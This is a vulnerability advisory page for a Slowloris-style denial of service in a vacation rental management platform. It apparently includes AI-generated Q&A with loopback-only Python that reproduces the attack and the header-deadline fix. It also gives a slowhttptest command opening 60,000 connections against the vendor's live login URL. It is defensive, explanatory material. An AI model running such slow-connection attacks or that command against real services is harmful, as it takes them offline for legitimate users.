CVE-2025-63561
BaseFortify
Publication date: 2025-10-31
Last updated on: 2025-11-05
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
| EPSS metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| summerpearlgroup | vacation_rental_management_platform | all versions before 1.0.2 (1.0.2 itself is not affected) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-400 | Uncontrolled Resource Consumption: the product does not properly control the allocation and maintenance of a limited resource (here, server connection slots and worker threads). |
AI Powered Q&A
Can you explain this vulnerability to me?
Versions of the Summer Pearl Group Vacation Rental Management Platform before 1.0.2 are vulnerable to a Slowloris-style denial of service. An attacker opens many HTTP connections and keeps each one alive by sending request headers a few bytes at a time, never sending the blank line that terminates the header block. The server assigns a worker thread or connection-pool slot to each connection as soon as it is accepted and holds it until the request completes, so a single low-bandwidth host can keep enough half-finished requests open to exhaust the pool. Once it is exhausted, legitimate users and API clients can no longer get a connection. [1]
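The exhaustion mechanism above, and the property a fix has to restore, can be reproduced locally. The following is an added example written for this page; it is not code from BaseFortify, the vendor, or the advisory, and the toy server, worker count, timings and the `/spgpm/login` path are illustrative assumptions. It runs a tiny HTTP server with a fixed worker pool on loopback, occupies every worker with one slow connection, and then checks whether a normal request is still answered. With no deadline on header completion (the vulnerable behaviour) the normal request times out; with a deadline on the whole header block the slow connections are dropped with 408 and the worker is freed. Note that the deadline is for the complete header, not per received byte: a per-read idle timeout is defeated by an attacker who sends one byte just before it expires.

```python
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor

HOST = "127.0.0.1"  # everything runs on loopback; no external traffic


class ToyServer:
    """HTTP server with a fixed worker pool: one worker per in-flight request.
    header_deadline=None: a worker waits forever for the headers to finish (vulnerable).
    header_deadline=seconds: the whole header block must arrive within that long
    after accept(), otherwise the client gets a 408 and the worker is released."""

    def __init__(self, workers, header_deadline=None):
        self.header_deadline = header_deadline
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind((HOST, 0))                  # ephemeral port
        self.listener.listen(128)
        self.listener.settimeout(0.1)                  # lets the accept loop notice close()
        self.port = self.listener.getsockname()[1]
        self.pool = ThreadPoolExecutor(max_workers=workers)
        self.stop = threading.Event()
        self.thread = threading.Thread(target=self._accept_loop, daemon=True)
        self.thread.start()

    def _accept_loop(self):
        while not self.stop.is_set():
            try:
                conn, _ = self.listener.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            self.pool.submit(self._handle, conn)       # queues behind busy workers

    def _handle(self, conn):
        started, buf = time.monotonic(), b""
        try:
            while b"\r\n\r\n" not in buf:              # end of the header block
                if self.header_deadline is not None:   # deadline for the whole header, not per byte
                    left = self.header_deadline - (time.monotonic() - started)
                    conn.settimeout(max(left, 0.001))
                try:
                    chunk = conn.recv(4096)
                except socket.timeout:
                    conn.sendall(b"HTTP/1.1 408 Request Timeout\r\nContent-Length: 0\r\n\r\n")
                    return
                if not chunk:                          # peer closed
                    return
                buf += chunk
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
        except OSError:                                # peer reset etc.
            pass
        finally:
            conn.close()

    def close(self):
        self.stop.set()
        self.thread.join()
        self.listener.close()
        self.pool.shutdown(wait=True)


class SlowClient:
    """One Slowloris-style connection: a valid request line, then a bogus header
    every `interval` seconds and never the blank line that ends the headers."""

    def __init__(self, port, interval=0.2):
        self.sock = socket.create_connection((HOST, port))
        self.sock.sendall(b"GET /spgpm/login HTTP/1.1\r\nHost: localhost\r\n")
        self.stop = threading.Event()
        self.thread = threading.Thread(target=self._drip, args=(interval,), daemon=True)
        self.thread.start()

    def _drip(self, interval):
        n = 0
        while not self.stop.wait(interval):
            n += 1
            try:
                self.sock.sendall(b"X-a: %d\r\n" % n)
            except OSError:                            # server dropped us (hardened case)
                return

    def close(self):
        self.stop.set()
        self.thread.join()
        self.sock.close()


def legit_request(port, timeout):
    """A complete GET from a normal client; True if a 200 arrives within `timeout` seconds."""
    try:
        with socket.create_connection((HOST, port), timeout=timeout) as s:
            s.sendall(b"GET /spgpm/login HTTP/1.1\r\nHost: localhost\r\n\r\n")
            return s.recv(64).startswith(b"HTTP/1.1 200")
    except OSError:                                    # includes the recv timeout
        return False


def run_scenario(workers, slow_connections, header_deadline, client_timeout):
    """Occupy the pool with slow connections, then report whether a normal request is still served."""
    server = ToyServer(workers, header_deadline)
    slow = [SlowClient(server.port) for _ in range(slow_connections)]
    time.sleep(0.3)                                    # let the workers pick them up
    try:
        return legit_request(server.port, client_timeout)
    finally:
        for c in slow:
            c.close()
        server.close()


if __name__ == "__main__":
    print("vulnerable (no header deadline):", run_scenario(4, 4, None, 1.5))  # False
    print("hardened (0.5 s header deadline):", run_scenario(4, 4, 0.5, 3.0))  # True
```

Four workers and four slow connections are enough to show the effect; the ratio is the whole point, since each slow connection costs the attacker one socket and a few bytes per second while it costs the server a full worker for as long as the server is willing to wait. The deadline does not make the attack impossible, it bounds what each connection can cost, which is why real deployments pair it with per-IP connection limits.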
How can this vulnerability impact me?
The impact is on availability: while the attacker keeps the slow connections open, the platform cannot accept connections from legitimate users or API clients, so the service is effectively offline and any business process or integration that depends on it stalls. The attack needs no credentials and very little bandwidth, so it is cheap to sustain for as long as the attacker wants. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The condition can be confirmed by reproducing a Slowloris-style load with the `slowhttptest` tool, as in the reference: `slowhttptest -c 60000 -B -g -o slowhttp -i 10 -r 60000 -t GET -u https://summerpearlgroup.gr/spgpm/login` opens up to 60,000 connections to the login endpoint, sends follow-up data every 10 seconds, and writes statistics (`-g -o slowhttp`) that show when the service stopped answering. [1] Three caveats before running it: this is a real denial-of-service test, so run it only against an instance you own or are explicitly authorized to test, and replace the URL above with that instance rather than the vendor's public site; `-B` is slowhttptest's slow-POST-body mode, while `-H` is the slow-headers (Slowloris) mode that matches the behaviour described for this CVE, and a thorough test covers both; and 60,000 connections exceeds the default open-file limit on most test hosts, so raise it with `ulimit -n` first or lower `-c`. The result to look for is that a normal request from a second client stops getting a response while the slow connections are open. On the server side, a pile-up of established connections per client IP (`ss -tan state established`) and a burst of 408 responses in the access log are the signs that the attack is happening to you rather than being simulated by you.
What immediate steps should I take to mitigate this vulnerability?
Upgrade the Summer Pearl Group Vacation Rental Management Platform to version 1.0.2 or later, where the vendor resolved the issue. [1] Until that is done, the standard Slowloris mitigations apply to any HTTP service and do not depend on the vendor fix: enforce a deadline for receiving the complete request headers and body at the reverse proxy or web server in front of the application (Apache mod_reqtimeout, nginx client_header_timeout and client_body_timeout), cap concurrent connections per client IP, and alert on spikes in 408 responses or in long-lived established connections. Simply adding worker threads does not help, because each slow connection costs the attacker almost nothing.